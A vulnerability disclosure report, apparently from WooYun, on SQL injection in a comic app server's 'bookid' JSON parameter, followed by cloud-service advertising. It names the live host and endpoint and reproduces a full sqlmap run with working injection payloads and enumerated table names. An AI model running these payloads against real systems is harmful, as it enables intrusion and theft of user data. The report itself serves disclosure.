Cartoon island Android app server SQL injection can cause user data and Server Information Leakage
Cartoon island Android app server SQL Injection
All user data and server information may be exposed.
Case Study of Automatic wooyun routing vulnerability discovery #01
How can I hit a vulnerability when I use wooyun route?
Problematic URL:/comic/comicsupdateinfo_sb
Question parameter (POST): bookid
Original request:
POST /comic/comicsupdateinfo_sb HTTP/1.1accept: */*connection: Keep-AliveContent-Type: application/x-www-form-urlencodedcharset: utf-8User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; A0001 Build/LMY48Y)Host: mhjk.1391.comAccept-Encoding: gzipContent-Length: 56[{"updatetime":"2016-01-21 00:00:00","bookid":"166465"}]
Problem description: The validity verification is not performed in the json bookid parameter, resulting in an SQL injection vulnerability and database data leakage.
Discovery process: the application is normally used under the wooyun router, and the burp report vulnerability is found. The vulnerability is submitted after being verified using SQLMAP. Only the data table name is obtained as a proof, without in-depth data theft.
[email protected]:~$ sqlmap -l 001 --tables _ ___ ___| |_____ ___ ___ {1.0-dev-f54b25c}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 18:22:24[18:22:24] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be testedURL 1:GET http://mhjk.1391.com:80/comic/comicsupdateinfo_sbPOST data: %5B%7B%22updatetime%22%3A%222016-01-21%2000%3A00%3A00%22%2C%22bookid%22%3A%22166465%2A%22%7D%5Ddo you want to test this URL? [Y/n/q]> y[18:22:26] [INFO] testing URL 'http://mhjk.1391.com:80/comic/comicsupdateinfo_sb'custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y[18:22:27] [INFO] using '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv' as the CSV results file in multiple targets mode[18:22:27] [INFO] testing connection to the target URL[18:22:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS[18:22:27] [INFO] testing if the target URL is stable[18:22:28] [INFO] target URL is stable[18:22:28] [INFO] testing if (custom) POST parameter '#1*' is dynamic[18:22:28] [WARNING] (custom) POST parameter '#1*' does not appear dynamic[18:22:29] [INFO] heuristics detected web page charset 'ascii'[18:22:29] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable[18:22:29] [INFO] testing for SQL injection on (custom) POST parameter '#1*'[18:22:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[18:22:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'[18:22:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'[18:22:29] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] yfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y[18:22:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[18:22:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[18:22:33] [INFO] target URL appears to be UNION injectable with 8 columns[18:22:34] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') AND (SELECT 1617 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(1617=1617,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('azUG'='azUG"}] Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') UNION ALL SELECT CONCAT(0x71707a6a71,0x64674969486c6b76796567494d486f455443747975696171545466717153425a4c616a7a5a534f41,0x716b707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"}]---do you want to exploit this SQL injection? [Y/n] y[18:22:43] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[18:22:43] [INFO] fetching database names[18:22:43] [INFO] fetching tables for databases: 'comic_biz, comic_library, comic_trade, information_schema, test'Database: comic_biz[95 tables]+---------------------------------------+| function || adgroup_info || admin_info || admin_log || adposition_info || album_bigbook_relation || album_info || application || award_info || award_info_copy || bigbook_channel_relation || bigbook_user_relation || blacklist_info || blacklist_info_copy || blog_at_relation || blog_info || blog_manage_log || blog_topic_relation || blogpic_info || blogpraise_info || blogrecommend_info || blogreply_info || book_channel_relation || bookpart_reading_log || channel_info || channel_tag_relation || community_info || community_section || community_section_user_relation || config_info || cucc_order_info || cucc_user_info || discuss_error_info || discuss_extend_info || discuss_info || discuss_reply_adimgs_info || discusspic || event_configs || feedback_info || filterwords_info || focuspicture_info || invitecode_info || invitecode_info_copy || iosdevice_info || jfq_iosdevice_info || keyword_info || list_bigbook_relation || page_discuss || page_discuss_extension || picpackage || platform_version || praiseinfo || promotion_info || recommendauthor_info || recommendbook_info || recommendcategory_info || recommendsubject_info || reply_info || role || role_function_relation || score_config || score_info || shop_info || special_bigbook_relation || special_book_relation || special_description || special_info || subject_channel_relation || t2 || tip_message_channel_relation || tip_message_info || tip_messsage_plaform_version_relation || tmp_jfq || topic_info || tt || user_expget_log || user_extend_info || user_info || user_invitecode_log || user_invitecode_log_copy || user_login_log || user_reduce_log || user_role_relation || user_search_info || user_search_info_history || user_token_info || useraward_log || useraward_log_copy || userawardnum_info || userfollow_info || version_info || wp_phone || wp_phone_book || wp_phone_push_log || znq_test |+---------------------------------------+Database: comic_library[44 tables]+---------------------------------------+| admin_info || author_info || bigbook_author_relation || bigbook_book_relation || bigbook_info || bigbook_jingpin || book_author_relation || book_info || book_jingpin || book_message_filter || book_message_info || book_temp_message_info || booksource_primer || bookupdate_info || cdn_page_info || cdn_part_info || domainconfig || lightbook || lightchapter || lightpart || message_template || page_info || page_size_info || part_info || part_test || sourcecomics_info || sourcecomics_info_relation || sourcesbook_down || sourcesbook_downid || subject_info || tempexecute || test || test_author || test_fan || test_sourceratio || test_top150 || test_top500 || test_zymk || tmp_cdnpart || toudi_account || toudi_partinfo || wp_phone || wp_phone_book || wp_phone_push_log |+---------------------------------------+Database: information_schema[40 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: comic_trade[86 tables]+---------------------------------------+| attentive_prompt || book_chapter_discount_history || book_chapter_price_history || book_discount_history || book_price || book_price_history || channel_contract_history || chapter_price || product_as_info || product_category_as_info || product_discount_history || product_duration_as_history || product_info || product_price_history || sign_setting || sign_setting_as || system_account_as_history || system_account_history || user_account_as_info || user_account_info || user_deposit_as_history || user_deposit_history || user_order_0 || user_order_1 || user_order_2 || user_order_3 || user_order_4 || user_order_5 || user_order_6 || user_order_7 || user_order_8 || user_order_9 || user_order_as_0 || user_order_as_1 || user_order_as_2 || user_order_as_3 || user_order_as_4 || user_order_as_5 || user_order_as_6 || user_order_as_7 || user_order_as_8 || user_order_as_9 || user_order_detail_0 || user_order_detail_1 || user_order_detail_2 || user_order_detail_3 || user_order_detail_4 || user_order_detail_5 || user_order_detail_6 || user_order_detail_7 || user_order_detail_8 || user_order_detail_9 || user_order_detail_as_0 || user_order_detail_as_1 || user_order_detail_as_2 || user_order_detail_as_3 || user_order_detail_as_4 || user_order_detail_as_5 || user_order_detail_as_6 || user_order_detail_as_7 || user_order_detail_as_8 || user_order_detail_as_9 || user_order_present_0 || user_order_present_1 || user_order_present_2 || user_order_present_3 || user_order_present_4 || user_order_present_5 || user_order_present_6 || user_order_present_7 || user_order_present_8 || user_order_present_9 || user_order_present_as_0 || user_order_present_as_1 || user_order_present_as_2 || user_order_present_as_3 || user_order_present_as_4 || user_order_present_as_5 || user_order_present_as_6 || user_order_present_as_7 || user_order_present_as_8 || user_order_present_as_9 || user_present_as_history || user_present_history || vwIOSUserMonthlyOrder || vwUserMonthlyOrder |+---------------------------------------+[18:22:43] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[18:22:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv'
Appendix: black cloud routing combined with the burp vulnerability prompt (then use sqlmap to test the vulnerability Hazard Based on the result)
Solution:
Filter two parameters in json
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
